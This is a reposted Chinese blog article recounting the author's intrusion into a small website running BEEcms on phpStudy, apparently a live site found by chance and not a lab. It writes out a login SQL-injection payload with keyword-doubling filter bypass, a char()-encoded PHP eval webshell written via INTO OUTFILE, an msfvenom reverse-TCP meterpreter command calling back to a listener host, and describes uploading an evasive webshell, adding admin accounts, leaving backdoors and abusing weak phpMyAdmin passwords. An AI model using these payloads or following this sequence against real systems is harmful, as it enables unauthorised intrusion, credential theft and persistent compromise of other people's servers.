0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記錄某一次無意點(diǎn)開的一個小網(wǎng)站的滲透過程

工程師鄧生 ? 來源:CSDN ? 作者:Deilty ? 2022-09-09 09:09 ? 次閱讀

記錄某一次無意點(diǎn)開的一個小網(wǎng)站的滲透過程,幸運(yùn)的是搭建平臺是phpstudy,cms是beecms,beecms有通用漏洞,然后去網(wǎng)上找了資料,成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過程

無意點(diǎn)開一個網(wǎng)站,發(fā)現(xiàn)網(wǎng)站比較小,且看起來比較老,然后發(fā)現(xiàn)logo沒有改,于是乎去百度搜索這個cms,發(fā)現(xiàn)有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

這里運(yùn)氣比較好,沒有更改后臺地址,還是默認(rèn)地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通過通用漏洞發(fā)先后臺管理處存在sql注入漏洞,直接輸入admin’,然后就會報錯,這里用萬能密碼不能登陸,看來還是得通過上面得通用漏洞來進(jìn)行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到輸入payload后,頁面返回正常,從而可以判斷有sql注入,這里采用雙寫進(jìn)行繞過a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

發(fā)現(xiàn)這個注入點(diǎn)后,就有各種各樣的注入方式了,通過sql語句寫入一句話,sqlmap一把梭,手工注入得到賬號密碼等等,怎么方便怎么來,這里我把幾種方法都寫一下,看看那種方法可以

方法一

1.通過post抓包sqlmap一把梭,dump出管理員賬號密碼,進(jìn)后臺找上傳點(diǎn)

2.一把梭,發(fā)現(xiàn)并沒有,使用腳本也沒有繞過

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通過burp抓包,寫入一句話,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發(fā)現(xiàn)寫入失敗,前面講到有防護(hù),這里通過hex編碼或者char函數(shù)繞過

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.對shell部分進(jìn)行編碼

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.寫入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x,看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜,運(yùn)氣好,默認(rèn)目錄

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蟻劍連接,成功連接,至此getshell完畢,下來就是后滲透階段,后面會講

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函數(shù)繞過:mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一樣成功寫入

1.寫入成功后,菜刀可以連接,我們訪問寫入的文件,驚奇的發(fā)現(xiàn)竟然有admin,和一串md5碼,大膽猜測可能是后臺賬號和密碼,試一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陸,然后就是后臺找上傳了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后滲透

通過whoami查看權(quán)限,發(fā)現(xiàn)是admin權(quán)限,但是不是最高權(quán)限,我們要提到最高權(quán)限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通過msf生成木馬提權(quán),payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過蟻劍上傳木馬,并執(zhí)行。執(zhí)行之前打開msf使用模塊use exploit/multi/handler,設(shè)置相應(yīng)參數(shù),然后開始監(jiān)聽

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么問題,用這個沒有成功,那么只能通過大馬提權(quán)了

方法二

1.上傳大馬,此處應(yīng)該有狗或者盾之類的,用的免殺,成功上傳

2.訪問大馬

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.這里提權(quán)方式很多,就不細(xì)說了,有大馬之后很多操作都可以引刃而解了,開放端口,添加賬號,留后門。。等等

4.創(chuàng)建admin權(quán)限賬號之后,登陸服務(wù)器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的發(fā)現(xiàn)

通過掃描目錄,還發(fā)現(xiàn)有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過phpmyadmin登陸,發(fā)現(xiàn)是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫入一句話getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、總結(jié) 1.前臺sql注入獲取用戶名密碼,進(jìn)入后臺找上傳 2.SQL注入語句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權(quán)

至此,滲透結(jié)束。


審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    751

    瀏覽量

    43990
  • 編碼
    +關(guān)注

    關(guān)注

    6

    文章

    920

    瀏覽量

    54713
  • ASCII
    +關(guān)注

    關(guān)注

    5

    文章

    171

    瀏覽量

    34997

原文標(biāo)題:實(shí)戰(zhàn) | 一次小網(wǎng)站滲透過程

文章出處:【微信號:菜鳥學(xué)信安,微信公眾號:菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    一次電源與二電源有什么不同

    在電力系統(tǒng)和電子設(shè)備的供電領(lǐng)域中,一次電源與二電源是兩至關(guān)重要的概念。它們各自承擔(dān)著不同的功能和角色,共同確保電力供應(yīng)的穩(wěn)定性和可靠性。本文將對一次電源與二
    的頭像 發(fā)表于 10-10 14:10 ?374次閱讀

    一次電池分類以及應(yīng)用場景詳解

    01 一次電池簡介 一次電池即原電池(primarycell、primarybattery)(俗稱干電池),是放電后不能再充電使其復(fù)原的電池,通電電池有正極、負(fù)極電解以及容器和隔膜等組成。 一次電池
    的頭像 發(fā)表于 09-30 17:52 ?266次閱讀
    <b class='flag-5'>一次</b>電池分類以及應(yīng)用場景詳解

    無線時鐘秒轉(zhuǎn)一次思路怎么設(shè)置

    創(chuàng)建無線時鐘,使其每秒轉(zhuǎn)動一次,涉及到多個領(lǐng)域的知識,包括電子工程、無線通信、編程和機(jī)械設(shè)計。 1. 項(xiàng)目概述 無線時鐘每秒轉(zhuǎn)動一次的項(xiàng)目可以分為以下幾個主要部分: 機(jī)械設(shè)計 :設(shè)
    的頭像 發(fā)表于 09-07 09:21 ?223次閱讀

    labview如何做到一次觸發(fā)采集一次

    最近在做一個電壓測試模塊,要求是在一個時間段內(nèi),出現(xiàn)上升沿觸發(fā)采集,并且只采集一次,采集次數(shù)為出現(xiàn)上升沿的次數(shù),采集時間,采樣率及單
    發(fā)表于 08-07 10:16

    記錄一次使用easypoi時與源碼博弈的過程

    、背景介紹 最近剛剛接手了保險線之聲平臺的開發(fā)和維護(hù)工作,第一個需要修復(fù)的問題是:平臺的事件導(dǎo)出成excel功能在經(jīng)過一次上線之后突然不可用了,于是就開始了幾輪痛苦的排查以及與源碼
    的頭像 發(fā)表于 07-03 16:33 ?263次閱讀
    <b class='flag-5'>記錄</b><b class='flag-5'>一次</b>使用easypoi時與源碼博弈的<b class='flag-5'>過程</b>

    一次消諧器的構(gòu)造

    今天來給大家介紹一下一次消諧器的構(gòu)造。 一次消諧器是種用于消除電力系統(tǒng)中的諧波及無功功率的裝置,它由感性元件和電容器構(gòu)成,感性元件用于吸收系統(tǒng)中的無功功率,而電容器則用于補(bǔ)償系統(tǒng)中的感性無功功率
    的頭像 發(fā)表于 05-30 14:55 ?297次閱讀

    鴻蒙OS開發(fā):【一次開發(fā),多端部署】(多天氣)項(xiàng)目

    本示例展示天氣應(yīng)用界面,包括首頁、城市管理、添加城市、更新時間彈窗,體現(xiàn)一次開發(fā),多端部署的能力。
    的頭像 發(fā)表于 05-20 14:59 ?755次閱讀
    鴻蒙OS開發(fā):【<b class='flag-5'>一次</b>開發(fā),多端部署】(<b class='flag-5'>一</b>多天氣)項(xiàng)目

    基波是一次諧波么 基波與一次諧波的區(qū)別

    基波是一次諧波么 基波與一次諧波的區(qū)別? 基波和一次諧波是兩不同的概念。 基波是在諧波分析中指的是頻率最低且沒有任何諧波成分的波形,它是構(gòu)成復(fù)雜波形的基礎(chǔ)。在正弦波中,基波就是正弦波
    的頭像 發(fā)表于 04-08 17:11 ?5281次閱讀

    DDoS攻擊規(guī)模最大的一次

    有史以來DDoS攻擊規(guī)模最大的是哪一次? Google Cloud團(tuán)隊在2017年9月披露了一次此前未公開的DDoS攻擊,其流量達(dá) 2.54Tbps,是迄今為止有記錄以來最大的DDoS攻擊。 在同時
    的頭像 發(fā)表于 01-18 15:39 ?421次閱讀

    記錄一次K8s pod被殺的排查過程

    今天下午運(yùn)維反饋說我們這一個pod天重啟了8,需要排查下原因。看Kiban日志,jvm沒有拋出過任何錯誤,服務(wù)就直接重啟了。
    的頭像 發(fā)表于 01-18 09:57 ?658次閱讀

    oracle如何一次添加多行數(shù)據(jù)

    INTO語句用于向表中插入數(shù)據(jù),可以一次插入行或多行數(shù)據(jù)。INSERT ALL語句可以一次性插入多個行,而不必多次執(zhí)行INSERT INTO語句。SELECT子句用于從另一個表中選
    的頭像 發(fā)表于 11-21 14:15 ?4985次閱讀

    記錄一次時序收斂的過程

    在之前的文章里面介紹了Canny算法的原理和基于Python的參考模型,之后呢在FPGA上完成了Canny算法的實(shí)現(xiàn),可是遇到了時序不收斂的問題,記錄下。
    的頭像 發(fā)表于 11-18 16:38 ?874次閱讀
    <b class='flag-5'>記錄</b><b class='flag-5'>一次</b>時序收斂的<b class='flag-5'>過程</b>

    電池的特征 一次電池與二電池的區(qū)別

    電池的特征以及一次電池與二電池之間的區(qū)別。 、二電池的特征: 1.可充電性:二電池是可以反復(fù)充電和放電的。在其內(nèi)部的化學(xué)反應(yīng)
    的頭像 發(fā)表于 11-17 14:49 ?2333次閱讀

    一次消諧裝置的種類介紹

    一次消諧裝置的種類介紹 一次消諧,也叫一次消諧器和一次消諧裝置。 一次消諧裝置根據(jù)電壓等級般可
    的頭像 發(fā)表于 11-15 11:08 ?482次閱讀

    一次消諧器如何接到PT

    一次消諧器在電力系統(tǒng)中扮演著至關(guān)重要的角色,它可以有效防止電力系統(tǒng)中的諧波干擾,保護(hù)設(shè)備正常運(yùn)行。然而,如何正確地將一次消諧器接到PT(電壓互感器)上,對于許多工程師和電力行業(yè)從業(yè)者來說,仍是
    的頭像 發(fā)表于 11-09 15:01 ?906次閱讀